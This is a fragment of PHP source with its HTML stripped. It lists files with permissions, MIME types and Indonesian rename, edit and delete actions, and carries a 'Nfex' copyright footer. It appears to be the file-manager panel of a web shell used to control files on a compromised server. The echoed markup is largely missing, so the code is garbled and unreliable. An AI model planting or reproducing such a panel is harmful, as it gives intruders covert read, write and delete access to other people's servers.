    '; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '
     Ubah Nama    Hapus
    '; if (strlen($file) > 25) { $_file = substr($file, 0, 25)."...-.".$ext; }else{ $_file = $file; } echo' '.$_file.''; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if($ext == "php") { echo 'application/octet-stream'; }elseif ($ext == "html") { echo 'text/html'; }elseif ($ext == "css") { echo 'application/octet-stream'; }elseif ($ext == "png") { echo 'image/png'; }elseif ($ext == "jpg") { echo 'image/jpg'; }elseif ($ext == "jpeg") { echo 'image/jpeg'; }elseif($ext == "zip") { echo 'dokumen/zip'; }elseif ($ext == "js") { echo 'text/js'; }elseif ($ext == "ttf") { echo 'application/octet-stream'; }elseif ($ext == "otf") { echo 'application/octet-stream'; }elseif ($ext == "txt") { echo 'text/txt'; }elseif ($ext == "ico") { echo 'application/octet-stream'; }elseif ($ext == "conf") { echo 'application/octet-stream'; }elseif ($ext == "htaccess") { echo 'application/octet-stream'; }elseif ($ext == "sh") { echo 'application/octet-stream'; }elseif ($ext == "py") { echo 'application/octet-stream'; }elseif ($ext == "sql") { echo 'application/octet-stream'; }elseif ($ext == "pl") { echo 'application/octet-stream'; }elseif ($ext == "pdf") { echo 'dokumen/pdf'; }elseif ($ext == "mp4") { echo 'media/mp4'; }elseif ($ext == "mp3") { echo 'media/mp3'; }elseif ($ext == "git") { echo 'application/octet-stream'; }elseif ($ext == "md") { echo 'application/octet-stream'; }else{ echo 'dokumen/docs'; } echo '
    '.$size.'
    '; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '
    		Lihat Edit Ubah Nama Hapus
    '; echo ""; echo '
    Copyright all right reserved '.date('M-Y').' Nfex
    '; ?>